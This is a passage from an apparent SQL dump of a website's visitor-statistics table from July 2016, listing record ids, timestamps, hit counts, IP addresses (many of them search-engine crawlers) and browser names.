78',''),(48925,1468472560,1,0,1,0,'66.249.78.171',''),(48926,1468473635,1,0,1,0,'66.249.78.136',''),(48927,1468473701,1,1,0,0,'180.76.15.6','other'),(48928,1468473751,2,0,2,0,'66.249.78.178',''),(48929,1468473846,1,1,0,0,'51.255.65.83','other'),(48930,1468473855,8,0,8,0,'66.249.78.171',''),(48931,1468473930,1,0,1,0,'66.249.64.185',''),(48932,1468474071,7,0,7,0,'66.249.78.164',''),(48933,1468474326,1,0,1,0,'66.249.64.152',''),(48934,1468474364,1,0,1,0,'66.249.78.150',''),(48935,1468474713,1,0,1,0,'66.249.78.143',''),(48936,1468474821,1,0,1,0,'66.249.64.155',''),(48937,1468474836,1,1,0,0,'91.233.49.254','chrome'),(48938,1468474859,1,0,1,0,'66.249.64.149',''),(48939,1468474945,1,1,0,0,'51.255.65.32','other'),(48940,1468474979,1,0,1,0,'66.249.78.178',''),(48941,1468474984,2,2,0,0,'95.158.42.34','chrome'),(48942,1468474986,1,1,0,0,'173.252.74.107','other'),(48943,1468475529,1,0,1,0,'66.249.78.136',''),(48944,1468476164,2,2,0,0,'95.158.42.34','chrome'),(48945,1468477252,1,1,0,0,'91.196.178.66','chrome'),(48946,1468477336,1,0,1,0,'66.249.78.136',''),(48947,1468479371,1,1,0,0,'157.55.39.196','other'),(48948,1468479732,1,1,0,0,'91.196.178.132','firefox'),(48949,1468480000,1,1,0,0,'91.196.178.165','chrome'),(48950,1468481088,1,1,0,0,'95.132.54.91','chrome'),(48951,1468482222,1,1,0,0,'78.111.187.193','firefox'),(48952,1468483228,1,1,0,0,'91.236.184.19','opera'),(48953,1468483673,1,1,0,0,'80.91.174.171','chrome'),(48954,1468483890,1,1,0,0,'91.196.178.67','firefox'),(48955,1468483968,1,1,0,0,'94.179.63.28','chrome'),(48956,1468485049,1,1,0,0,'207.46.13.100','other'),(48957,1468485353,1,1,0,0,'91.124.38.26','chrome'),(48958,1468485715,1,1,0,0,'130.180.211.177','firefox'),(48959,1468486384,1,1,0,0,'94.179.22.209','firefox'),(48960,1468486733,1,1,0,0,'194.187.106.118','chrome'),(48961,1468486824,1,1,0,0,'164.132.161.52','other'),(48962,1468487631,1,1,0,0,'91.196.178.69','chrome'),(48963,1468488335,1,1,0,0,'164.132.161.25','other'),(48964,1468488491,1,1,0,0,'194.44.65.94','firefox'),(48965,1468488723,1,1,0,0,'194.44.122.38','chrome'),(48966,1468488957,1,1,0,0,'164.132.161.18','other'),(48967,1468489107,1,1,0,0,'51.255.65.61','other'),(48968,1468489153,1,1,0,0,'51.255.65.42','other'),(48969,1468489448,1,1,0,0,'91.196.178.161','chrome'),(48970,1468493139,1,1,0,0,'40.77.167.26','other'),(48971,1468493190,1,1,0,0,'157.55.39.80','other'),(48972,1468493759,1,1,0,0,'164.132.161.22','other'),(48973,1468493856,1,1,0,0,'37.52.133.34','chrome'),(48974,1468494500,1,1,0,0,'5.58.82.81','chrome'),(48975,1468495612,1,1,0,0,'164.132.161.22','other'),(48976,1468495872,1,1,0,0,'195.114.121.73','firefox'),(48977,1468496231,1,1,0,0,'207.46.13.142','other'),(48978,1468496691,1,1,0,0,'194.44.122.38','chrome'),(48979,1468497050,1,1,0,0,'91.196.178.69','firefox'),(48980,1468497518,1,1,0,0,'5.255.253.67','other'),(48981,1468497940,1,1,0,0,'91.196.178.132','chrome'),(48982,1468497962,1,1,0,0,'180.153.201.217','other'),(48983,1468497981,1,1,0,0,'101.226.33.225','chrome'),(48984,1468497993,1,1,0,0,'101.226.102.97','other'),(48985,1468498331,1,1,0,0,'91.196.178.132','firefox'),(48986,1468498550,1,1,0,0,'91.196.178.70','firefox'),(48987,1468499141,1,1,0,0,'93.158.152.51','other'),(48988,1468499780,1,1,0,0,'207.46.13.93','other'),(48989,1468501632,1,1,0,0,'40.77.167.31','other'),(48990,1468501712,1,1,0,0,'66.249.93.113','chrome'),(48991,1468501921,1,1,0,0,'207.46.13.93','other'),(48992,1468502311,1,1,0,0,'141.8.142.58','other'),(48993,1468502692,1,1,0,0,'141.8.142.25','other'),(48994,1468502828,1,1,0,0,'40.77.167.31','other'),(48995,1468503278,1,1,0,0,'51.255.65.47','other'),(48996,1468503435,1,1,0,0,'91.196.178.69','firefox'),(48997,1468503793,1,1,0,0,'82.207.91.234','firefox'),(48998,1468504044,2,2,0,0,'91.196.178.161','chrome'),(48999,1468504139,1,1,0,0,'91.196.178.36','firefox'),(49000,1468504610,1,1,0,0,'194.44.122.38','chrome'),(49001,1468504901,1,1,0,0,'164.132.161.95','other'),(49002,1468505002,1,1,0,0,'207.46.13.93','other'),(49003,1468505208,1,1,0,0,'40.77.167.6','other'),(49004,1468506511,1,1,0,0,'130.193.51.19','other'),(49005,1468506651,1,1,0,0,'91.196.178.66','firefox'),(49006,1468507009,1,1,0,0,'130.180.210.172','firefox'),(49007,1468508183,2,2,0,0,'40.77.167.6','other'),(49008,1468508466,1,1,0,0,'164.132.161.57','other'),(49009,1468508547,1,1,0,0,'207.46.13.142','other'),(49010,1468508730,1,1,0,0,'130.193.51.19','other'),(49011,1468510875,1,1,0,0,'104.236.102.54','other'),(49012,1468511281,1,1,0,0,'40.77.167.6','other'),(49013,1468511469,1,0,1,0,'66.249.78.143',''),(49014,1468511629,1,1,0,0,'51.255.65.24','other'),(49015,1468512005,3,3,0,0,'130.193.50.34','other'),(49016,1468512126,1,1,0,0,'51.255.65.36','other'),(49017,1468512244,1,0,1,0,'66.249.78.164',''),(49019,1468512286,1,1,0,0,'91.196.178.66','chrome'),(49020,1468512304,1,1,0,0,'130.193.51.19','other'),(49021,1468512416,1,0,1,0,'66.249.78.171',''),(49022,1468513282,1,0,1,0,'66.249.78.164',''),(49023,1468513649,1,1,0,0,'82.145.208.76','other'),(49024,1468514836,1,1,0,0,'141.8.183.25','other'),(49025,1468514897,1,1,0,0,'164.132.161.69','other'),(49026,1468514979,1,1,0,0,'130.193.50.34','other'),(49027,1468516358,1,1,0,0,'141.8.183.25','other'),(49028,1468516831,1,1,0,0,'130.193.51.19','other'),(49029,1468516896,1,1,0,0,'207.46.13.142','other'),(49030,1468516953,1,1,0,0,'164.132.161.40','other'),(49031,1468517729,1,1,0,0,'51.255.65.80','other'),(49032,1468517956,1,1,0,0,'193.150.57.56','chrome'),(49033,1468517988,1,0,1,0,'66.249.78.150',''),(49034,1468518566,1,1,0,0,'92.112.124.50','firefox'),(49035,1468519996,1,1,0,0,'141.8.132.41','other'),(49036,1468520091,1,1,0,0,'46.211.2.185','chrome'),(49037,1468521820,1,1,0,0,'51.255.65.21','other'),(49038,1468521955,1,1,0,0,'51.255.65.57','other'),(49039,1468523351,2,2,0,0,'130.193.51.79','other'),(49040,1468523355,1,1,0,0,'93.158.152.75','other'),(49041,1468523445,1,1,0,0,'94.178.7.168','chrome'),(49042,1468523932,1,0,1,0,'66.249.78.171',''),(49043,1468525667,1,1,0,0,'95.135.16.59','chrome'),(49044,1468525963,1,1,0,0,'151.80.31.181','other'),(49045,1468525978,1,1,0,0,'51.254.141.247','other'),(49046,1468526561,1,1,0,0,'180.76.15.6','other'),(49047,1468526566,1,1,0,0,'157.55.39.188','other'),(49048,1468528064,1,1,0,0,'94.178.249.38','chrome'),(49049,1468528098,1,1,0,0,'207.46.13.142','other'),(49050,1468528961,1,1,0,0,'91.196.178.66','firefox'),(49051,1468529413,1,1,0,0,'130.193.50.34','other'),(49052,1468529765,1,1,0,0,'141.8.142.67','other'),(49053,1468530275,1,1,0,0,'207.46.13.142','other'),(49054,1468532362,1,1,0,0,'207.46.13.142','other'),(49055,1468532953,1,1,0,0,'66.249.78.136','chrome'),(49056,1468532959,300,300,0,0,'91.209.51.22','other'),(49057,1468533010,1,1,0,0,'91.196.178.68','other'),(49058,1468534203,1,1,0,0,'130.193.51.19','other'),(49059,1468534212,1,1,0,0,'93.158.152.61','other'),(49060,1468534466,1,1,0,0,'66.249.78.164','chrome'),(49061,1468534483,93,93,0,0,'46.4.120.3','other'),(49062,1468534521,1,1,0,0,'207.46.13.172','other'),(49063,1468535386,192,192,0,0,'46.4.120.3','other'),(49064,1468536306,1,1,0,0,'164.132.161.13','other'),(49065,1468536393,1,1,0,0,'46.188.106.191','chrome'),(49066,1468536394,1,1,0,0,'95.221.235.65','firefox'),(49068,1468536395,1,1,0,0,'176.77.108.237','firefox'),(49069,1468538101,1,1,0,0,'141.8.183.25','other'),(49070,1468538204,1,1,0,0,'207.46.13.151','other'),(49071,1468540075,1,1,0,0,'40.77.167.39','other'),(49072,1468540928,1,1,0,0,'5.9.62.130','other'),(49073,1468541066,1,1,0,0,'180.76.15.34','other'),(49074,1468541068,1,1,0,0,'180.76.15.150','other'),(49075,1468541614,1,1,0,0,'202.46.55.179','other'),(49076,1468543623,1,1,0,0,'207.46.13.142','other'),(49077,1468543671,1,1,0,0,'141.8.183.25','other'),(49078,1468543733,1,1,0,0,'151.80.31.169','other'),(49079,1468545462,1,1,0,0,'164.132.161.46','other'),(49080,1468545674,1,1,0,0,'40.77.167.39','other'),(49081,1468546498,1,1,0,0,'157.55.39.234','other'),(49082,1468547252,1,1,0,0,'51.255.65.68','other'),(49083,1468549653,1,1,0,0,'207.46.13.125','other'),(49084,1468552312,1,1,0,0,'66.249.78.178','chrome'),(49085,1468555631,1,1,0,0,'51.255.65.18','other'),(49086,1468558201,1,1,0,0,'157.55.39.178','other'),(49087,1468558286,1,1,0,0,'188.93.56.216','firefox'),(49088,1468560839,1,1,0,0,'91.196.178.66','chrome'),(49089,1468562492,1,1,0,0,'130.193.50.34','other'),(49090,1468562828,1,1,0,0,'91.196.178.163','chrome'),(49091,1468564051,1,1,0,0,'94.179.40.168','firefox'),(49092,1468564087,1,1,0,0,'82.207.91.234','firefox'),(49093,1468564156,1,1,0,0,'91.124.24.163','chrome'),(49094,1468564188,1,1,0,0,'66.102.9.103','chrome'),(49095,1468564274,1,1,0,0,'51.255.65.64','other'),(49096,1468565273,1,1,0,0,'141.8.183.25','other'),(49097,1468566114,1,1,0,0,'157.55.39.195','other'),(49098,1468566872,1,1,0,0,'37.53.226.205','firefox'),(49099,1468568434,1,1,0,0,'157.55.39.202','other'),(49100,1468568690,1,1,0,0,'51.254.130.60','other'),(49101,1468569370,1,1,0,0,'91.196.178.36','firefox'),(49102,1468569437,1,1,0,0,'91.196.178.129','firefox'),(49103,1468569623,1,1,0,0,'141.8.132.10','other'),(49104,1468569627,1,1,0,0,'130.193.51.19','other'),(49105,1468570334,2,2,0,0,'66.249.78.164','chrome'),(49106,1468571025,2,2,0,0,'66.249.78.171','chrome'),(49107,1468571282,1,1,0,0,'91.196.178.69','firefox'),(49108,1468571372,1,1,0,0,'46.147.210.190','chrome'),(49109,1468571373,1,1,0,0,'95.221.242.244','firefox'),(49111,1468571374,1,1,0,0,'37.110.152.222','firefox'),(49112,1468571808,1,1,0,0,'141.8.183.25','other'),(49113,1468572043,1,1,0,0,'141.8.142.61','other'),(49114,1468572174,1,1,0,0,'180.76.15.31','other'),(49115,1468573502,1,1,0,0,'91.196.178.69','chrome'),(49116,1468573927,1,1,0,0,'91.196.178.66','firefox'),(49117,1468574184,1,1,0,0,'180.76.15.160','other'),(49118,1468574452,1,1,0,0,'91.196.178.70','firefox'),(49119,1468575141,1,1,0,0,'130.193.50.34','other'),(49120,1468575671,1,1,0,0,'91.196.178.164','chrome'),(49121,1468575985,1,1,0,0,'130.193.51.19','other'),(49122,1468576630,1,1,0,0,'51.254.32.67','other'),(49123,1468576794,1,1,0,0,'91.196.178.69','firefox'),(49124,1468577014,1,1,0,0,'51.255.65.57','other'),(49125,1468577348,1,0,1,0,'66.249.78.178',''),(49126,1468577851,4,4,0,0,'178.6.246.231','other'),(49127,1468577888,2,2,0,0,'94.178.192.40','chrome'),(49128,1468578045,1,1,0,0,'91.196.178.163','chrome'),(49129,1468578309,1,1,0,0,'213.238.10.34','chrome'),(49130,1468578790,1,1,0,0,'130.193.50.34','other'),(49131,1468579153,1,1,0,0,'130.193.51.19','other'),(49132,1468579300,2,2,0,0,'141.8.142.61','other'),(49133,1468579458,1,1,0,0,'176.77.84.88','msie'),(49134,1468579462,1,1,0,0,'95.25.106.144','msie'),(49135,1468579463,1,1,0,0,'91.77.85.129','msie'),(49137,1468579525,1,1,0,0,'91.196.178.129','firefox'),(49138,1468579902,1,1,0,0,'213.238.10.34','chrome'),(49139,1468580719,1,1,0,0,'207.241.226.218','other'),(49140,1468580737,1,1,0,0,'176.9.1.111','other'),(49141,1468581255,1,1,0,0,'193.29.204.4','other'),(49142,1468581263,1,1,0,0,'78.152.183.30','firefox'),(49143,1468581826,1,1,0,0,'51.255.65.17','other'),(49144,1468582213,75,75,0,0,'62.212.73.211','other'),(49145,1468582864,1,1,0,0,'66.249.69.149','chrome'),(49146,1468583729,1,1,0,0,'91.196.178.67','firefox'),(49147,1468583789,1,1,0,0,'130.193.50.34','other'),(49148,1468584094,1,1,0,0,'95.132.57.98','chrome'),(49149,1468584904,1,1,0,0,'164.132.161.8','other'),(49150,1468584946,1,1,0,0,'82.207.91.234','firefox'),(49151,1468585471,1,1,0,0,'95.133.25.145','firefox'),(49152,1468586224,1,1,0,0,'51.255.65.61','other'),(49153,1468587275,2,2,0,0,'141.8.183.25','other'),(49154,1468587545,2,2,0,0,'130.193.50.34','other'),(49155,1468587807,1,1,0,0,'91.196.178.163','chrome'),(49156,1468588065,1,1,0,0,'164.132.161.25','other'),(49157,1468588218,1,1,0,0,'130.193.51.19','other'),(49158,1468588354,2,2,0,0,'141.8.183.25','other'),(49159,1468588427,1,1,0,0,'193.34.172.243','firefox'),(49160,1468588819,1,0,1,0,'68.180.230.178',''),(49161,1468590336,2,2,0,0,'130.193.50.34','other'),(49162,1468590488,2,2,0,0,'141.8.183.25','other'),(49163,1468590571,1,1,0,0,'51.255.65.74','other'),(49164,1468590667,1,1,0,0,'66.249.64.152','chrome'),(49165,1468590746,1,1,0,0,'141.8.142.58','other'),(49166,1468590826,1,1,0,0,'91.196.178.65','firefox'),(49167,1468591162,1,1,0,0,'51.255.65.32','other'),(49168,1468591702,1,1,0,0,'130.193.50.34','other'),(49169,1468593359,1,1,0,0,'66.249.93.125','chrome'),(49170,1468593362,1,1,0,0,'91.196.178.36','firefox'),(49171,1468594165,1,1,0,0,'151.80.31.175','other'),(49172,1468595485,1,1,0,0,'130.193.51.79','other'),(49173,1468595728,1,1,0,0,'157.55.39.39','other'),(49174,1468595860,1,0,1,0,'66.249.78.136',''),(49175,1468595988,1,0,1,0,'66.249.78.171',''),(49176,1468596242,1,1,0,0,'141.8.183.25','other'),(49177,1468596308,5,0,5,0,'66.249.78.164',''),(49178,1468596396,2,0,2,0,'66.249.64.149',''),(49179,1468596575,1,1,0,0,'164.132.161.12','other'),(49180,1468597473,3,3,0,0,'130.193.50.34','other'),(49181,1468597762,1,0,1,0,'66.249.78.143',''),(49182,1468597822,2,2,0,0,'141.8.142.58','other'),(49183,1468597825,2,2,0,0,'141.8.183.25','other'),(49184,1468597833,1,1,0,0,'141.8.142.61','other'),(49185,1468598442,1,1,0,0,'51.255.65.59','other'),(49186,1468599563,1,1,0,0,'207.46.13.168','other'),(49187,1468600532,1,0,1,0,'66.249.78.143',''),(49188,1468600827,1,1,0,0,'93.158.152.84','other'),(49189,1468601099,3,3,0,0,'141.8.183.25','other'),(49190,1468601178,1,1,0,0,'157.55.39.8','other'),(49191,1468601792,1,1,0,0,'157.55.39.233','other'),(49192,1468602555,1,1,0,0,'51.255.65.84','other'),(49193,1468602751,1,1,0,0,'66.249.78.164','chrome'),(49194,1468603410,1,1,0,0,'51.255.65.49','other'),(49195,1468603492,1,0,1,0,'66.249.78.136',''),(49196,1468603688,1,0,1,0,'66.249.78.164',''),(49197,1468604409,1,1,0,0,'141.8.183.25','other'),(49198,1468604859,1,1,0,0,'91.196.178.33','chrome'),(49199,1468605953,1,1,0,0,'91.196.178.65','chrome'),(49200,1468608090,1,1,0,0,'93.158.152.84','other'),(49201,1468608228,1,1,0,0,'141.8.142.58','other'),(49202,1468609221,1,1,0,0,'180.76.15.148','other'),(49203,1468609425,1,1,0,0,'66.249.78.178','chrome'),(49204,1468610647,1,0,1,0,'66.249.78.178',''),(49205,1468610731,1,0,1,0,'66.249.78.143',''),(49206,1468611364,1,1,0,0,'40.77.167.47','other'),(49207,1468611569,1,1,0,0,'141.8.183.25','other'),(49208,1468611771,1,0,1,0,'66.249.78.143',''),(49209,1468611816,1,0,1,0,'66.249.75.95',''),(49210,1468612080,1,1,0,0,'180.76.15.25','other'),(49211,1468612130,1,1,0,0,'164.132.161.69','other'),(49212,1468612789,4,4,0,0,'69.30.210.242','other'),(49213,1468612798,1,0,1,0,'66.249.78.164',''),(49214,1468614089,1,1,0,0,'180.76.15.163','other'),(49215,1468615224,1,1,0,0,'141.8.183.25','other'),(49216,1468616099,1,1,0,0,'180.76.15.24','other'),(49217,1468616197,2,2,0,0,'130.193.50.34','other'),(49218,1468616287,1,1,0,0,'164.132.161.2','other'),(49219,1468618270,1,1,0,0,'164.132.161.84','other'),(49220,1468618379,1,1,0,0,'130.193.50.34','other'),(49221,1468618753,1,1,0,0,'51.255.65.84','other'),(49222,1468621075,1,1,0,0,'164.132.161.26','other'),(49223,1468622324,2,2,0,0,'130.193.51.19','other'),(49224,1468623251,1,1,0,0,'180.76.15.148','other'),(49225,1468623633,1,1,0,0,'141.8.142.58','other'),(49226,1468624025,1,0,1,0,'66.249.78.178',''),(49227,1468624910,1,1,0,0,'208.115.113.92','other'),(49228,1468625641,1,1,0,0,'157.55.39.54','other'),(49229,1468626382,1,1,0,0,'130.193.50.34','other'),(49230,1468626757,1,1,0,0,'157.55.39.202','other'),(49231,1468626986,1,1,0,0,'216.38.216.197','chrome'),(49233,1468628900,1,0,1,0,'66.249.69.155',''),(49234,1468629916,1,1,0,0,'151.80.31.169','other'),(49235,1468629970,1,1,0,0,'141.8.183.25','other'),(49236,1468630189,1,1,0,0,'207.46.13.168','other'),(49237,1468630372,1,1,0,0,'40.77.167.47','other'),(49238,1468630500,1,0,1,0,'66.249.78.164',''),(49239,1468630750,1,1,0,0,'130.193.50.34','other'),(49240,1468631719,1,1,0,0,'180.76.15.149','other'),(49241,1468633178,1,1,0,0,'130.193.50.34','other'),(49242,1468633354,2,2,0,0,'157.55.39.163','other'),(49243,1468634708,1,1,0,0,'130.193.50.34','other'),(49244,1468634789,1,1,0,0,'157.55.39.163','other'),(49245,1468635271,1,1,0,0,'141.8.183.25','other'),(49246,1468635784,1,0,1,0,'66.249.78.136',''),(49247,1468635795,1,1,0,0,'164.132.161.45','other'),(49248,1468636187,1,1,0,0,'151.80.31.155','other'),(49249,1468638155,1,1,0,0,'157.55.39.163','other'),(49250,1468638255,1,0,1,0,'66.249.75.81',''),(49251,1468640087,1,0,1,0,'66.249.78.150',''),(49252,1468640502,1,0,1,0,'66.249.75.81',''),(49253,1468643083,1,1,0,0,'130.193.50.34','other'),(49254,1468643916,1,1,0,0,'157.55.39.146','other'),(49255,1468644718,1,1,0,0,'141.8.183.25','other'),(49256,1468646368,3,3,0,0,'5.9.62.130','other'),(49257,1468647680,1,1,0,0,'207.46.13.26','other'),(49258,1468649104,1,1,0,0,'130.193.50.34','other'),(49259,1468652985,1,0,1,0,'66.249.78.136',''),(49260,1468653271,2,1,1,0,'66.249.78.171',''),(49261,1468653945,1,1,0,0,'66.249.78.178','chrome'),(49262,1468654052,1,1,0,0,'195.16.77.215','other'),(49263,1468654588,3,3,0,0,'130.193.50.34','other'),(49264,1468655812,1,1,0,0,'130.193.50.34','other'),(49265,1468656109,1,1,0,0,'66.249.78.178','chrome'),(49266,1468657325,1,1,0,0,'91.196.178.36','firefox'),(49267,1468657345,1,0,1,0,'66.249.78.178',''),(49268,1468658442,1,1,0,0,'66.249.78.143','chrome'),(49269,1468658602,1,1,0,0,'207.46.13.135','other'),(49270,1468658663,1,1,0,0,'66.249.78.164','chrome'),(49271,1468658903,1,1,0,0,'208.115.113.82','other'),(49272,1468660920,1,1,0,0,'66.249.78.164','chrome'),(49273,1468661498,1,1,0,0,'40.77.167.43','other'),(49274,1468661976,1,1,0,0,'164.132.161.65','other'),(49275,1468664499,1,1,0,0,'66.249.78.150','chrome'),(49276,1468664677,1,1,0,0,'66.249.78.171','chrome'),(49277,1468665226,2,2,0,0,'195.211.212.33','chrome'),(49278,1468665819,4,4,0,0,'130.193.50.34','other'),(49279,1468666130,1,1,0,0,'157.55.39.119','other'),(49280,1468667754,1,1,0,0,'141.8.183.25','other'),(49281,1468668353,1,1,0,0,'208.43.225.84','other'),(49282,1468669174,1,0,1,0,'66.249.69.155',''),(49283,1468670676,1,1,0,0,'40.77.167.43','other'),(49284,1468671111,1,1,0,0,'151.80.31.157','other'),(49285,1468672071,1,1,0,0,'130.193.51.19','other'),(49286,1468672198,1,1,0,0,'130.193.50.34','other'),(49287,1468672739,1,0,1,0,'66.249.78.150',''),(49288,1468674635,1,1,0,0,'164.132.161.31','other'),(49289,1468674870,1,1,0,0,'180.76.15.31','other'),(49290,1468676007,1,1,0,0,'130.193.51.19','other'),(49291,1468679380,1,1,0,0,'141.8.183.25','other'),(49292,1468680061,1,1,0,0,'141.8.142.61','other'),(49293,1468680087,1,1,0,0,'141.8.142.58','other'),(49294,1468680613,1,0,1,0,'66.249.78.136',''),(49295,1468680622,2,2,0,0,'130.193.50.34','other'),(49296,1468680629,3,0,3,0,'68.180.230.178',''),(49297,1468680827,1,0,1,0,'66.249.78.143',''),(49298,1468681196,1,0,1,0,'66.249.78.164',''),(49299,1468681615,1,1,0,0,'141.8.142.67','other'),(49300,1468682320,1,0,1,0,'66.249.78.150',''),(49301,1468682357,1,0,1,0,'66.249.78.171',''),(49302,1468683484,1,1,0,0,'141.8.183.25','other'),(49303,1468684290,1,0,1,0,'66.249.78.136',''),(49304,1468684543,1,0,1,0,'66.249.78.171',''),(49305,1468687813,1,1,0,0,'94.179.109.120','firefox'),(49306,1468687840,1,1,0,0,'130.193.51.19','other'),(49307,1468687871,1,0,1,0,'66.249.78.164',''),(49308,1468688497,1,1,0,0,'130.193.50.34','other'),(49309,1468690120,1,0,1,0,'66.249.64.152',''),(49310,1468690204,1,1,0,0,'130.193.50.34','other'),(49311,1468690619,1,0,1,0,'66.249.64.149',''),(49312,1468690638,1,1,0,0,'208.115.113.82','other'),(49313,1468692443,1,1,0,0,'130.193.50.34','other'),(49314,1468692924,1,1,0,0,'180.76.15.33','other'),(49315,1468694281,1,1,0,0,'208.115.113.92','other'),(49316,1468695555,1,0,1,0,'66.249.78.171',''),(49317,1468695748,1,1,0,0,'82.145.217.144','other'),(49318,1468697872,1,1,0,0,'208.115.113.82','other'),(49319,1468698675,1,1,0,0,'66.249.78.178','chrome'),(49320,1468699263,1,0,1,0,'66.249.78.171',''),(49321,1468699353,1,1,0,0,'208.115.113.82','other'),(49322,1468699652,1,1,0,0,'217.69.136.205','other'),(49323,1468701184,1,1,0,0,'141.8.142.67','other'),(49324,1468701617,1,1,0,0,'66.249.78.178','chrome'),(49325,1468702748,1,0,1,0,'66.249.78.164',''),(49326,1468703720,1,1,0,0,'95.135.241.146','chrome'),(49327,1468705063,1,1,0,0,'208.115.113.82','other'),(49328,1468706209,2,2,0,0,'213.239.205.207','other'),(49329,1468706475,1,1,0,0,'66.249.64.149','chrome'),(49330,1468706823,1,1,0,0,'141.8.183.19','other'),(49331,1468709709,1,1,0,0,'157.55.39.178','other'),(49332,1468709942,1,0,1,0,'66.249.78.178',''),(49333,1468709976,1,0,1,0,'66.249.78.171',''),(49334,1468710014,6,0,6,0,'66.249.78.164',''),(49335,1468710016,1,0,1,0,'66.249.78.143',''),(49336,1468710027,1,0,1,0,'66.249.78.136',''),(49337,1468710555,1,1,0,0,'164.132.161.59','other'),(49338,1468710653,1,1,0,0,'164.132.161.29','other'),(49339,1468711311,1,0,1,0,'66.249.78.150',''),(49340,1468711864,1,0,1,0,'66.249.78.178',''),(49341,1468712277,1,1,0,0,'180.76.15.5','other'),(49342,1468713319,1,0,1,0,'66.249.78.178',''),(49343,1468714204,1,1,0,0,'208.115.113.82','other'),(49344,1468714287,1,1,0,0,'180.76.15.152','other'),(49345,1468714734,1,0,1,0,'66.249.78.178',''),(49346,1468714742,1,1,0,0,'51.255.65.34','other'),(49347,1468715250,1,1,0,0,'192.99.9.164','chrome'),(49348,1468715338,1,1,0,0,'66.249.64.155','chrome'),(49349,1468715699,1,1,0,0,'157.55.39.254','other'),(49350,1468719400,2,2,0,0,'51.255.48.156','other'),(49351,1468721240,1,1,0,0,'130.193.50.34','other'),(49352,1468721303,1,1,0,0,'180.76.15.156','other'),(49353,1468723053,1,1,0,0,'208.115.113.92','other'),(49354,1468724680,27,27,0,0,'144.76.29.162','other'),(49355,1468727848,1,1,0,0,'217.69.133.216','other'),(49356,1468728740,1,1,0,0,'151.80.31.100','other'),(49357,1468730414,1,0,1,0,'66.249.78.150',''),(49358,1468730998,3,3,0,0,'130.193.50.34','other'),(49359,1468731227,1,1,0,0,'141.8.183.25','other'),(49360,1468731358,3,3,0,0,'130.193.51.19','other'),(49361,1468731408,2,2,0,0,'141.8.142.58','other'),(49362,1468731857,1,1,0,0,'207.46.13.86','other'),(49363,1468734380,1,1,0,0,'66.102.9.103','chrome'),(49364,1468735036,1,1,0,0,'94.179.68.85','firefox'),(49365,1468735671,1,1,0,0,'141.8.142.58','other'),(49366,1468737142,1,1,0,0,'141.8.183.25','other'),(49367,1468738888,1,1,0,0,'151.80.31.157','other'),(49368,1468739718,1,1,0,0,'180.76.15.138','other'),(49369,1468741155,1,1,0,0,'141.8.142.58','other'),(49370,1468741156,2,2,0,0,'141.8.142.61','other'),(49371,1468742528,1,0,1,0,'66.249.78.150',''),(49372,1468745442,1,0,1,0,'66.249.78.164',''),(49373,1468745761,1,1,0,0,'51.255.65.31','other'),(49374,1468747817,1,0,1,0,'66.249.64.155',''),(49375,1468748036,1,1,0,0,'37.54.17.224','other'),(49376,1468749316,1,1,0,0,'164.132.161.82','other'),(49377,1468749405,1,1,0,0,'141.8.183.25','other'),(49378,1468749561,2,2,0,0,'130.193.50.34','other'),(49379,1468749905,1,1,0,0,'164.132.161.34','other'),(49380,1468751159,1,1,0,0,'66.249.64.185','chrome'),(49381,1468751338,1,0,1,0,'66.249.78.136',''),(49382,1468751480,1,1,0,0,'66.249.78.164','chrome'),(49383,1468751721,1,1,0,0,'130.193.50.34','other'),(49384,1468751745,1,1,0,0,'66.249.78.178','chrome'),(49385,1468753187,1,1,0,0,'66.249.78.150','chrome'),(49386,1468754824,2,2,0,0,'40.77.167.13','other'),(49387,1468755820,1,1,0,0,'130.193.50.34','other'),(49388,1468758269,1,1,0,0,'141.8.183.25','other'),(49389,1468760379,1,1,0,0,'62.210.148.246','other'),(49390,1468760841,1,1,0,0,'141.8.183.25','other'),(49391,1468762981,1,1,0,0,'157.55.39.67','other'),(49392,1468763397,1,1,0,0,'130.193.50.34','other'),(49393,1468764160,1,1,0,0,'40.77.167.80','other'),(49394,1468764275,1,1,0,0,'93.72.191.130','opera'),(49395,1468764526,2,2,0,0,'130.193.50.34','other'),(49396,1468765041,1,1,0,0,'141.8.142.58','other'),(49397,1468765287,1,1,0,0,'93.72.191.130','opera'),(49398,1468765744,1,1,0,0,'93.158.152.84','other'),(49399,1468766133,1,1,0,0,'46.211.249.74','chrome'),(49400,1468766211,1,1,0,0,'208.115.113.92','other'),(49401,1468766352,3,3,0,0,'130.193.50.34','other'),(49402,1468766555,1,1,0,0,'180.76.15.21','other'),(49403,1468766914,1,1,0,0,'141.8.183.25','other'),(49404,1468768642,1,1,0,0,'180.76.15.148','other'),(49405,1468769330,1,1,0,0,'40.77.167.80','other'),(49406,1468770770,2,2,0,0,'130.193.50.34','other'),(49407,1468771977,1,1,0,0,'46.211.70.83','chrome'),(49408,1468772249,1,1,0,0,'46.211.249.100','chrome'),(49409,1468772546,2,0,2,0,'66.249.78.143',''),(49410,1468773096,1,0,1,0,'66.249.78.171',''),(49411,1468773883,1,0,1,0,'66.249.78.178',''),(49412,1468774610,4,4,0,0,'62.210.143.245','other'),(49413,1468775499,1,1,0,0,'130.193.51.19','other'),(49414,1468776442,1,1,0,0,'66.249.78.171','chrome'),(49415,1468776642,1,0,1,0,'66.249.78.164',''),(49416,1468777714,1,1,0,0,'40.77.167.38','other'),(49417,1468777808,1,0,1,0,'66.249.78.171',''),(49418,1468778102,6,6,0,0,'130.193.50.34','other'),(49419,1468778940,15,15,0,0,'89.163.148.22','other'),(49420,1468779382,1,1,0,0,'130.193.50.34','other'),(49421,1468779743,2,0,2,0,'66.249.78.164',''),(49422,1468780226,1,0,1,0,'66.249.78.178',''),(49423,1468780639,1,1,0,0,'208.115.113.92','other'),(49424,1468781714,1,1,0,0,'130.193.50.34','other'),(49425,1468781819,1,1,0,0,'40.77.167.9','other'),(49426,1468783073,1,1,0,0,'93.74.235.26','chrome'),(49427,1468783247,1,0,1,0,'66.249.78.164',''),(49428,1468783514,1,0,1,0,'66.249.78.171',''),(49429,1468783704,1,0,1,0,'66.249.78.136',''),(49430,1468783961,1,0,1,0,'66.249.64.149',''),(49431,1468785111,1,1,0,0,'141.8.142.58','other'),(49432,1468785239,3,3,0,0,'141.8.183.25','other'),(49433,1468785343,4,4,0,0,'130.193.50.34','other'),(49434,1468785557,11,11,0,0,'69.30.210.242','other'),(49435,1468788406,1,1,0,0,'66.249.78.171','chrome'),(49436,1468793060,1,0,1,0,'66.249.78.143',''),(49437,1468793355,1,1,0,0,'141.8.142.41','other'),(49438,1468793493,1,1,0,0,'130.193.51.74','other'),(49439,1468793762,1,1,0,0,'130.193.51.19','other'),(49440,1468794374,1,1,0,0,'208.115.113.82','other'),(49441,1468794507,1,1,0,0